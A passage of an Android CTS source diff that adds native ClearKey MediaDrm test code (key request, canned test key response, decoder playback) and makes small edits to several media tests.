+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <jni.h>
+#include <stdio.h>
+
+extern int register_android_media_cts_NativeClearKeySystemTest(JNIEnv*);
+
+jint JNI_OnLoad(JavaVM *vm, void */*reserved*/) {
+ JNIEnv *env = NULL;
+
+ if (vm->GetEnv((void **) &env, JNI_VERSION_1_4) != JNI_OK) {
+ return JNI_ERR;
+ }
+
+ if (register_android_media_cts_NativeClearKeySystemTest(env)) {
+ return JNI_ERR;
+ }
+
+ return JNI_VERSION_1_4;
+}
diff --git a/tests/tests/media/libmediandkjni/md5_utils.cpp b/tests/tests/media/libmediandkjni/md5_utils.cpp
index f4f893a..8e520e1 100644
--- a/tests/tests/media/libmediandkjni/md5_utils.cpp
+++ b/tests/tests/media/libmediandkjni/md5_utils.cpp
@@ -157,7 +157,7 @@
*/
void
MD5Transform(UWORD32 buf[4], UWORD32 const in[16]) {
- register UWORD32 a, b, c, d;
+ UWORD32 a, b, c, d;
a = buf[0];
b = buf[1];
diff --git a/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
new file mode 100644
index 0000000..b98a6af
--- /dev/null
+++ b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
@@ -0,0 +1,690 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define TAG "NativeMediaDrm"
+
+#include <utils/Log.h>
+#include <sys/types.h>
+
+#include <string>
+#include <vector>
+
+#include <assert.h>
+#include <jni.h>
+#include <JNIHelp.h>
+
+#include <android/native_window_jni.h>
+
+#include "AMediaObjects.h"
+
+#include "media/NdkMediaCodec.h"
+#include "media/NdkMediaCrypto.h"
+#include "media/NdkMediaDrm.h"
+#include "media/NdkMediaExtractor.h"
+#include "media/NdkMediaFormat.h"
+#include "media/NdkMediaMuxer.h"
+
+typedef std::vector<uint8_t> Uuid;
+
+struct fields_t {
+ jfieldID surface;
+ jfieldID mimeType;
+ jfieldID audioUrl;
+ jfieldID videoUrl;
+};
+
+struct PlaybackParams {
+ jobject surface;
+ jstring mimeType;
+ jstring audioUrl;
+ jstring videoUrl;
+};
+
+static fields_t gFieldIds;
+static bool gGotVendorDefinedEvent = false;
+
+static const size_t kPlayTimeSeconds = 30;
+static const size_t kUuidSize = 16;
+
+static const uint8_t kWidevineUuid[kUuidSize] = {
+ 0xed, 0xef, 0x8b, 0xa9, 0x79, 0xd6, 0x4a, 0xce,
+ 0xa3, 0xc8, 0x27, 0xdc, 0xd5, 0x1d, 0x21, 0xed
+};
+
+// The test content is not packaged with clearkey UUID,
+// we have to use a canned clearkey pssh for the test.
+static const uint8_t kClearkeyPssh[] = {
+ // BMFF box header (4 bytes size + 'pssh')
+ 0x00, 0x00, 0x00, 0x34, 0x70, 0x73, 0x73, 0x68,
+ // full box header (version = 1 flags = 0)
+ 0x01, 0x00, 0x00, 0x00,
+ // system id
+ 0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02,
+ 0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b,
+ // number of key ids
+ 0x00, 0x00, 0x00, 0x01,
+ // key id
+ 0x60, 0x06, 0x1e, 0x01, 0x7e, 0x47, 0x7e, 0x87,
+ 0x7e, 0x57, 0xd0, 0x0d, 0x1e, 0xd0, 0x0d, 0x1e,
+ // size of data, must be zero
+ 0x00, 0x00, 0x00, 0x00
+};
+
+static const uint8_t kKeyRequestData[] = {
+ 0x7b, 0x22, 0x6b, 0x69, 0x64,
+ 0x73, 0x22, 0x3a, 0x5b, 0x22,
+ 0x59, 0x41, 0x59, 0x65, 0x41,
+ 0x58, 0x35, 0x48, 0x66, 0x6f,
+ 0x64, 0x2b, 0x56, 0x39, 0x41,
+ 0x4e, 0x48, 0x74, 0x41, 0x4e,
+ 0x48, 0x67, 0x22, 0x5d, 0x2c,
+ 0x22, 0x74, 0x79, 0x70, 0x65,
+ 0x22, 0x3a, 0x22, 0x74, 0x65,
+ 0x6d, 0x70, 0x6f, 0x72, 0x61,
+ 0x72, 0x79, 0x22, 0x7d,
+};
+
+static const size_t kKeyRequestSize = sizeof(kKeyRequestData);
+
+// base 64 encoded JSON response string, must not contain padding character '='
+static const char kResponse[] = "{\"keys\":[{\"kty\":\"oct\"," \
+ "\"kid\":\"YAYeAX5Hfod+V9ANHtANHg\",\"k\":" \
+ "\"GoogleTestKeyBase64ggg\"}]}";
+
+static bool isUuidSizeValid(Uuid uuid) {
+ return (uuid.size() == kUuidSize);
+}
+
+static std::vector<uint8_t> jbyteArrayToVector(
+ JNIEnv* env, jbyteArray const &byteArray) {
+ uint8_t* buffer = reinterpret_cast<uint8_t*>(
+ env->GetByteArrayElements(byteArray, /*is_copy*/NULL));
+ std::vector<uint8_t> vector;
+ for (jsize i = 0; i < env->GetArrayLength(byteArray); ++i) {
+ vector.push_back(buffer[i]);
+ }
+ return vector;
+}
+
+static Uuid jbyteArrayToUuid(JNIEnv* env, jbyteArray const &uuid) {
+ Uuid juuid;
+ juuid.resize(0);
+ if (uuid != NULL) {
+ juuid = jbyteArrayToVector(env, uuid);
+ }
+ return juuid;
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest_isCryptoSchemeSupportedNative(
+ JNIEnv* env, jclass /*clazz*/, jbyteArray uuid) {
+
+ if (NULL == uuid) {
+ jniThrowException(env, "java/lang/NullPointerException", "null uuid");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (isUuidSizeValid(juuid)) {
+ return AMediaDrm_isCryptoSchemeSupported(&juuid[0], NULL);
+ } else {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ }
+ return JNI_FALSE;
+}
+
+void initPlaybackParams(JNIEnv* env, const jobject &playbackParams, PlaybackParams ¶ms) {
+ params.surface = env->GetObjectField(
+ playbackParams, gFieldIds.surface);
+
+ params.mimeType = static_cast<jstring>(env->GetObjectField(
+ playbackParams, gFieldIds.mimeType));
+
+ params.audioUrl = static_cast<jstring>(env->GetObjectField(
+ playbackParams, gFieldIds.audioUrl));
+
+ params.videoUrl = static_cast<jstring>(env->GetObjectField(
+ playbackParams, gFieldIds.videoUrl));
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest_testGetPropertyStringNative(
+ JNIEnv* env, jclass clazz, jbyteArray uuid,
+ jstring name, jobject outValue) {
+
+ if (NULL == uuid || NULL == name || NULL == outValue) {
+ jniThrowException(env, "java/lang/NullPointerException",
+ "One or more null input parameters");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (!isUuidSizeValid(juuid)) {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ return JNI_FALSE;
+ }
+
+ AMediaObjects aMediaObjects;
+ aMediaObjects.setDrm(AMediaDrm_createByUUID(&juuid[0]));
+ if (NULL == aMediaObjects.getDrm()) {
+ jniThrowException(env, "java/lang/RuntimeException", "null MediaDrm");
+ return JNI_FALSE;
+ }
+
+ const char *utf8_name = env->GetStringUTFChars(name, NULL);
+ const char *utf8_outValue = NULL;
+ media_status_t status = AMediaDrm_getPropertyString(aMediaObjects.getDrm(),
+ utf8_name, &utf8_outValue);
+ env->ReleaseStringUTFChars(name, utf8_name);
+
+ if (NULL != utf8_outValue) {
+ clazz = env->GetObjectClass(outValue);
+ jmethodID mId = env->GetMethodID (clazz, "append",
+ "(Ljava/lang/String;)Ljava/lang/StringBuffer;");
+ jstring outString = env->NewStringUTF(
+ static_cast<const char *>(utf8_outValue));
+ env->CallObjectMethod(outValue, mId, outString);
+ } else {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "get property string returns %d", status);
+ return JNI_FALSE;
+ }
+ return JNI_TRUE;
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest__testPsshNative(
+ JNIEnv* env, jclass /*clazz*/, jbyteArray uuid, jstring videoUrl) {
+
+ if (NULL == uuid || NULL == videoUrl) {
+ jniThrowException(env, "java/lang/NullPointerException",
+ "null uuid or null videoUrl");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (!isUuidSizeValid(juuid)) {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ return JNI_FALSE;
+ }
+
+ AMediaObjects aMediaObjects;
+ aMediaObjects.setVideoExtractor(AMediaExtractor_new());
+ const char* url = env->GetStringUTFChars(videoUrl, 0);
+ if (url) {
+ media_status_t status = AMediaExtractor_setDataSource(
+ aMediaObjects.getVideoExtractor(), url);
+ env->ReleaseStringUTFChars(videoUrl, url);
+
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "set video data source error=%d", status);
+ return JNI_FALSE;
+ }
+ }
+
+ PsshInfo* psshInfo = AMediaExtractor_getPsshInfo(aMediaObjects.getVideoExtractor());
+ if (psshInfo == NULL) {
+ jniThrowException(env, "java/lang/RuntimeException", "null psshInfo");
+ return JNI_FALSE;
+ }
+
+ jboolean testResult = JNI_FALSE;
+ for (size_t i = 0; i < psshInfo->numentries; i++) {
+ PsshEntry *entry = &psshInfo->entries[i];
+
+ // We do not have clearkey content that contains ClearKey UUID in the
+ // pssh box. So we have to test if it has Widevine UUID instead.
+ // TODO: Replace kWidevineUuid with uuid when test content contains
+ // ClearKey UUID.
+ if (0 == memcmp(entry->uuid, kWidevineUuid, sizeof(entry->uuid))) {
+ aMediaObjects.setCrypto(
+ AMediaCrypto_new(entry->uuid, entry->data, entry->datalen));
+ if (aMediaObjects.getCrypto()) {
+ testResult = JNI_TRUE;
+ } else {
+ ALOGE("Failed to create media crypto=%zd", i);
+ testResult = JNI_FALSE;
+ }
+ break;
+ }
+ }
+ return testResult;
+}
+
+static bool isVideo(const char* mime) {
+ return !strncmp(mime, "video/", 6) ? true : false;
+}
+
+static bool isAudio(const char* mime) {
+ return !strncmp(mime, "audio/", 6) ? true : false;
+}
+
+static void addTrack(const AMediaFormat* format,
+ const char* mime, const AMediaCrypto* crypto,
+ const ANativeWindow* window, AMediaCodec** codec) {
+
+ *codec = AMediaCodec_createDecoderByType(mime);
+ if (codec == NULL) {
+ ALOGE("cannot create codec for %s", mime);
+ return;
+ }
+
+ AMediaCodec_configure(*codec, format,
+ const_cast<ANativeWindow*>(window),
+ const_cast<AMediaCrypto*>(crypto), 0);
+}
+
+static void addTracks(const AMediaExtractor* extractor,
+ const AMediaCrypto* crypto, const ANativeWindow* window,
+ AMediaCodec** codec) {
+ size_t numTracks = AMediaExtractor_getTrackCount(
+ const_cast<AMediaExtractor*>(extractor));
+ AMediaFormat* trackFormat = NULL;
+ for (size_t i = 0; i < numTracks; ++i) {
+ trackFormat = AMediaExtractor_getTrackFormat(
+ const_cast<AMediaExtractor*>(extractor), i);
+ if (trackFormat) {
+ ALOGV("track %zd format: %s", i,
+ AMediaFormat_toString(trackFormat));
+
+ const char* mime = "";
+ if (!AMediaFormat_getString(
+ trackFormat, AMEDIAFORMAT_KEY_MIME, &mime)) {
+ ALOGE("no mime type");
+ AMediaFormat_delete(trackFormat);
+ return;
+ } else if (isAudio(mime) || isVideo(mime)) {
+ AMediaExtractor_selectTrack(
+ const_cast<AMediaExtractor*>(extractor), i);
+ ALOGV("track %zd codec format: %s", i,
+ AMediaFormat_toString(trackFormat));
+
+ addTrack(trackFormat, mime, crypto, window, codec);
+ AMediaCodec_start(*codec);
+ AMediaCodec_flush(*codec);
+ AMediaExtractor_seekTo(
+ const_cast<AMediaExtractor*>(extractor), 0,
+ AMEDIAEXTRACTOR_SEEK_PREVIOUS_SYNC);
+ }
+ AMediaFormat_delete(trackFormat);
+ }
+ }
+}
+
+static int64_t getSystemNanoTime() {
+ timespec now;
+ clock_gettime(CLOCK_MONOTONIC, &now);
+ return now.tv_sec * 1000000000LL + now.tv_nsec;
+}
+
+static void fillDecoder(AMediaCodec* codec, AMediaExtractor* extractor,
+ int64_t* presentationTimeUs, bool* eosReached) {
+ media_status_t status = AMEDIA_OK;
+
+ ssize_t bufferIndex = AMediaCodec_dequeueInputBuffer(codec, 2000);
+ if (bufferIndex >= 0) {
+ size_t bufsize;
+ uint8_t* buf = AMediaCodec_getInputBuffer(codec, bufferIndex, &bufsize);
+
+ int sampleSize = AMediaExtractor_readSampleData(extractor, buf, bufsize);
+ if (sampleSize < 0) {
+ sampleSize = 0;
+ *eosReached = true;
+ }
+
+ *presentationTimeUs = AMediaExtractor_getSampleTime(extractor);
+
+ AMediaCodecCryptoInfo *cryptoInfo =
+ AMediaExtractor_getSampleCryptoInfo(extractor);
+ if (cryptoInfo) {
+ status = AMediaCodec_queueSecureInputBuffer(
+ codec, bufferIndex, 0, cryptoInfo,
+ *presentationTimeUs,
+ *eosReached ? AMEDIACODEC_BUFFER_FLAG_END_OF_STREAM : 0);
+ AMediaCodecCryptoInfo_delete(cryptoInfo);
+ } else {
+ status = AMediaCodec_queueInputBuffer(
+ codec, bufferIndex, 0, sampleSize,
+ *presentationTimeUs,
+ *eosReached ? AMEDIACODEC_BUFFER_FLAG_END_OF_STREAM : 0);
+ }
+ AMediaExtractor_advance(extractor);
+ }
+}
+
+static bool drainDecoder(AMediaCodec* codec, int64_t presentationTimeUs,
+ int64_t* startTimeNano) {
+
+ AMediaCodecBufferInfo info;
+ ssize_t bufferIndex = AMediaCodec_dequeueOutputBuffer(codec, &info, 0);
+ if (bufferIndex >= 0) {
+ if (info.flags & AMEDIACODEC_BUFFER_FLAG_END_OF_STREAM) {
+ return true; // eos reached
+ }
+
+ if (*startTimeNano < 0) {
+ *startTimeNano = getSystemNanoTime() - (presentationTimeUs * 1000);
+ }
+ int64_t delay = (*startTimeNano + presentationTimeUs * 1000) -
+ getSystemNanoTime();
+ if (delay > 0) {
+ usleep(delay / 1000);
+ }
+
+ AMediaCodec_releaseOutputBuffer(codec, bufferIndex, info.size != 0);
+ } else if (bufferIndex == AMEDIACODEC_INFO_OUTPUT_BUFFERS_CHANGED) {
+ ALOGV("output buffers changed");
+ } else if (bufferIndex == AMEDIACODEC_INFO_OUTPUT_FORMAT_CHANGED) {
+ AMediaFormat* format = AMediaCodec_getOutputFormat(codec);
+ ALOGV("format changed to: %s", AMediaFormat_toString(format));
+ AMediaFormat_delete(format);
+ } else if (bufferIndex == AMEDIACODEC_INFO_TRY_AGAIN_LATER) {
+ ALOGV("no output buffer right now");
+ usleep(20000);
+ } else {
+ ALOGV("unexpected info code: %zd", bufferIndex);
+ }
+ return false;
+}
+
+static jboolean playContent(JNIEnv* env, const AMediaObjects& aMediaObjects,
+ PlaybackParams& params, const AMediaDrmSessionId& sessionId, Uuid uuid) {
+
+ ANativeWindow *window = ANativeWindow_fromSurface(env, params.surface);
+ AMediaExtractor* audioExtractor = aMediaObjects.getAudioExtractor();
+ AMediaExtractor* videoExtractor = aMediaObjects.getVideoExtractor();
+
+ AMediaCodec* audioCodec = NULL;
+ AMediaCodec* videoCodec = NULL;
+ AMediaCrypto* crypto = NULL;
+
+ crypto = AMediaCrypto_new(&uuid[0], sessionId.ptr, sessionId.length);
+ if (crypto == NULL) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "failed to create crypto object");
+ return JNI_FALSE;
+ }
+
+ addTracks(audioExtractor, NULL, NULL, &audioCodec);
+ addTracks(videoExtractor, crypto, window, &videoCodec);
+
+ bool sawAudioInputEos = false;
+ bool sawAudioOutputEos = false;
+ bool sawVideoInputEos = false;
+ bool sawVideoOutputEos = false;
+ int64_t videoPresentationTimeUs = 0;
+ int64_t videoStartTimeNano = -1;
+ struct timespec timeSpec;
+ clock_gettime(CLOCK_MONOTONIC, &timeSpec);
+ time_t startTimeSec = timeSpec.tv_sec;
+
+ while (!sawAudioOutputEos && !sawVideoOutputEos) {
+ if (!sawVideoInputEos) {
+ fillDecoder(videoCodec, videoExtractor,
+ &videoPresentationTimeUs, &sawVideoInputEos);
+ }
+
+ if (!sawAudioInputEos) {
+ // skip audio, still need to advance the audio extractor
+ AMediaExtractor_advance(audioExtractor);
+ }
+
+ if (!sawVideoOutputEos) {
+ sawVideoOutputEos = drainDecoder(videoCodec, videoPresentationTimeUs,
+ &videoStartTimeNano);
+ }
+
+ clock_gettime(CLOCK_MONOTONIC, &timeSpec);
+ if (timeSpec.tv_sec >= static_cast<time_t>(
+ (startTimeSec + kPlayTimeSeconds))) {
+ // stop reading samples and drain the output buffers
+ sawAudioInputEos = sawVideoInputEos = true;
+ sawAudioOutputEos = true; // ignore audio
+ }
+ }
+
+ if (audioCodec) {
+ AMediaCodec_stop(audioCodec);
+ AMediaCodec_delete(audioCodec);
+ }
+ if (videoCodec) {
+ AMediaCodec_stop(videoCodec);
+ AMediaCodec_delete(videoCodec);
+ }
+
+ AMediaCrypto_delete(crypto);
+ ANativeWindow_release(window);
+ return JNI_TRUE;
+}
+
+static void listener(
+ AMediaDrm* /*drm*/, const AMediaDrmSessionId* /*sessionId*/,
+ AMediaDrmEventType eventType,
+ int /*extra*/, const uint8_t* /*data*/, size_t /*dataSize*/) {
+
+ switch (eventType) {
+ case EVENT_PROVISION_REQUIRED:
+ ALOGD("EVENT_PROVISION_REQUIRED received");
+ break;
+ case EVENT_KEY_REQUIRED:
+ ALOGD("EVENT_KEY_REQUIRED received");
+ break;
+ case EVENT_KEY_EXPIRED:
+ ALOGD("EVENT_KEY_EXPIRED received");
+ break;
+ case EVENT_VENDOR_DEFINED:
+ gGotVendorDefinedEvent = true;
+ ALOGD("EVENT_VENDOR_DEFINED received");
+ break;
+ default:
+ ALOGD("Unknown event received");
+ break;
+ }
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest_testClearKeyPlaybackNative(
+ JNIEnv* env, jclass /*clazz*/, jbyteArray uuid, jobject playbackParams) {
+ if (NULL == uuid || NULL == playbackParams) {
+ jniThrowException(env, "java/lang/NullPointerException",
+ "null uuid or null playback parameters");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (!isUuidSizeValid(juuid)) {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ return JNI_FALSE;
+ }
+
+ PlaybackParams params;
+ initPlaybackParams(env, playbackParams, params);
+
+ AMediaObjects aMediaObjects;
+ media_status_t status = AMEDIA_OK;
+ aMediaObjects.setDrm(AMediaDrm_createByUUID(&juuid[0]));
+ if (NULL == aMediaObjects.getDrm()) {
+ jniThrowException(env, "java/lang/RuntimeException", "null MediaDrm");
+ return JNI_FALSE;
+ }
+
+ status = AMediaDrm_setOnEventListener(aMediaObjects.getDrm(), listener);
+ if (status != AMEDIA_OK) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "setOnEventListener failed");
+ return JNI_FALSE;
+ }
+
+ aMediaObjects.setAudioExtractor(AMediaExtractor_new());
+ const char* url = env->GetStringUTFChars(params.audioUrl, 0);
+ if (url) {
+ status = AMediaExtractor_setDataSource(
+ aMediaObjects.getAudioExtractor(), url);
+ env->ReleaseStringUTFChars(params.audioUrl, url);
+
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "set audio data source error=%d", status);
+ return JNI_FALSE;
+ }
+ }
+
+ aMediaObjects.setVideoExtractor(AMediaExtractor_new());
+ url = env->GetStringUTFChars(params.videoUrl, 0);
+ if (url) {
+ status = AMediaExtractor_setDataSource(
+ aMediaObjects.getVideoExtractor(), url);
+ env->ReleaseStringUTFChars(params.videoUrl, url);
+
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "set video data source error=%d", status);
+ return JNI_FALSE;
+ }
+ }
+
+ AMediaDrmSessionId sessionId;
+ status = AMediaDrm_openSession(aMediaObjects.getDrm(), &sessionId);
+ if (status != AMEDIA_OK) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "openSession failed");
+ return JNI_FALSE;
+ }
+
+ // Pointer to keyRequest memory, which remains until the next
+ // AMediaDrm_getKeyRequest call or until the drm object is released.
+ const uint8_t* keyRequest;
+ size_t keyRequestSize = 0;
+
+ // The server recognizes "video/mp4" but not "video/avc".
+ status = AMediaDrm_getKeyRequest(aMediaObjects.getDrm(), &sessionId,
+ kClearkeyPssh, sizeof(kClearkeyPssh),
+ "video/mp4" /*mimeType*/, KEY_TYPE_STREAMING,
+ NULL, 0, &keyRequest, &keyRequestSize);
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "getKeyRequest failed, error = %d", status);
+ AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ return JNI_FALSE;
+ }
+
+ if (kKeyRequestSize != keyRequestSize) {
+ ALOGE("Invalid keyRequestSize %zd", keyRequestSize);
+ return JNI_FALSE;
+ }
+
+ if (memcmp(kKeyRequestData, keyRequest, kKeyRequestSize) != 0) {
+ ALOGE("Invalid keyRequest data is returned");
+ return JNI_FALSE;
+ }
+
+ AMediaDrmKeySetId keySetId;
+ gGotVendorDefinedEvent = false;
+ status = AMediaDrm_provideKeyResponse(aMediaObjects.getDrm(), &sessionId,
+ reinterpret_cast<const uint8_t*>(kResponse),
+ sizeof(kResponse), &keySetId);
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "provideKeyResponse failed, error = %d", status);
+ AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ return JNI_FALSE;
+ }
+
+ // Check if the event listener has received the expected event sent by
+ // provideKeyResponse. This is for testing AMediaDrm_setOnEventListener().
+ const char *utf8_outValue = NULL;
+ status = AMediaDrm_getPropertyString(aMediaObjects.getDrm(),
+ "listenerTestSupport", &utf8_outValue);
+ if (status == AMEDIA_OK && NULL != utf8_outValue) {
+ std::string eventType(utf8_outValue);
+ if (eventType.compare("true") == 0) {
+ int count = 0;
+ while (!gGotVendorDefinedEvent && count++ < 5) {
+ // Prevents race condition when the event arrives late
+ usleep(1000);
+ }
+ if (!gGotVendorDefinedEvent) {
+ ALOGE("Event listener did not receive the expected event.");
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "Event listener did not receive the expected event.");
+ AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ return JNI_FALSE;
+ }
+ }
+ }
+
+ playContent(env, aMediaObjects, params, sessionId, juuid);
+
+ status = AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ if (status != AMEDIA_OK) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "closeSession failed");
+ return JNI_FALSE;
+ }
+ return JNI_TRUE;
+}
+
+static JNINativeMethod gMethods[] = {
+ { "isCryptoSchemeSupportedNative", "([B)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest_isCryptoSchemeSupportedNative },
+
+ { "testClearKeyPlaybackNative",
+ "([BLandroid/media/cts/NativeClearKeySystemTest$PlaybackParams;)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest_testClearKeyPlaybackNative },
+
+ { "testGetPropertyStringNative",
+ "([BLjava/lang/String;Ljava/lang/StringBuffer;)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest_testGetPropertyStringNative },
+
+ { "testPsshNative", "([BLjava/lang/String;)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest__testPsshNative },
+};
+
+int register_android_media_cts_NativeClearKeySystemTest(JNIEnv* env) {
+ jint result = JNI_ERR;
+ jclass testClass =
+ env->FindClass("android/media/cts/NativeClearKeySystemTest");
+ if (testClass) {
+ jclass playbackParamsClass = env->FindClass(
+ "android/media/cts/NativeClearKeySystemTest$PlaybackParams");
+ if (playbackParamsClass) {
+ jclass surfaceClass =
+ env->FindClass("android/view/Surface");
+ if (surfaceClass) {
+ gFieldIds.surface = env->GetFieldID(playbackParamsClass,
+ "surface", "Landroid/view/Surface;");
+ } else {
+ gFieldIds.surface = NULL;
+ }
+ gFieldIds.mimeType = env->GetFieldID(playbackParamsClass,
+ "mimeType", "Ljava/lang/String;");
+ gFieldIds.audioUrl = env->GetFieldID(playbackParamsClass,
+ "audioUrl", "Ljava/lang/String;");
+ gFieldIds.videoUrl = env->GetFieldID(playbackParamsClass,
+ "videoUrl", "Ljava/lang/String;");
+ } else {
+ ALOGE("PlaybackParams class not found");
+ }
+
+ } else {
+ ALOGE("NativeClearKeySystemTest class not found");
+ }
+
+ result = env->RegisterNatives(testClass, gMethods,
+ sizeof(gMethods) / sizeof(JNINativeMethod));
+ return result;
+}
diff --git a/tests/tests/media/src/android/media/cts/ConnectionStatus.java b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
index 407e553..37fc75e 100644
--- a/tests/tests/media/src/android/media/cts/ConnectionStatus.java
+++ b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
@@ -132,14 +132,6 @@
}
public void testConnection(Uri uri) {
- final String GOOG = "www.google.com";
-
- if (pingTest(GOOG)) {
- Log.d(TAG, "Successfully pinged " + GOOG);
- } else {
- Log.e(TAG, "Failed to ping " + GOOG);
- }
-
if (pingTest(uri.getHost())) {
Log.d(TAG, "Successfully pinged " + uri.getHost());
} else {
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
index e7b8adf..7b74ba7 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
@@ -19,10 +19,7 @@
import android.annotation.TargetApi;
import android.content.Context;
-import android.cts.util.MediaUtils;
import android.graphics.Bitmap;
-import android.media.MediaFormat;
-import android.support.test.runner.AndroidJUnit4;
import android.util.Log;
import android.view.View;
@@ -139,23 +136,17 @@
private void runH264DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
}
private void runVP9DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_VP9)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
}
private void runH264DecodeCroppedTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
}
private void runDecodeAccuracyTest(
diff --git a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
index 3cbfdbf..2d38933 100644
--- a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
@@ -424,6 +424,18 @@
return 1;
}
+ public void testRecordAudioFromAudioSourceUnprocessed() throws Exception {
+ if (!hasMicrophone() || !hasAmrNb()) {
+ MediaUtils.skipTest("no audio codecs or microphone");
+ return;
+ }
+ mMediaRecorder.setAudioSource(MediaRecorder.AudioSource.UNPROCESSED);
+ mMediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
+ mMediaRecorder.setOutputFile(OUTPUT_PATH);
+ mMediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
+ recordMedia(MAX_FILE_SIZE, mOutFile);
+ }
+
public void testGetAudioSourceMax() throws Exception {
final int max = MediaRecorder.getAudioSourceMax();
assertTrue(MediaRecorder.AudioSource.DEFAULT <= max);
diff --git a/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
new file mode 100644
index 0000000..1d4500f
--- /dev/null
+++ b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
@@ -0,0 +1,267 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
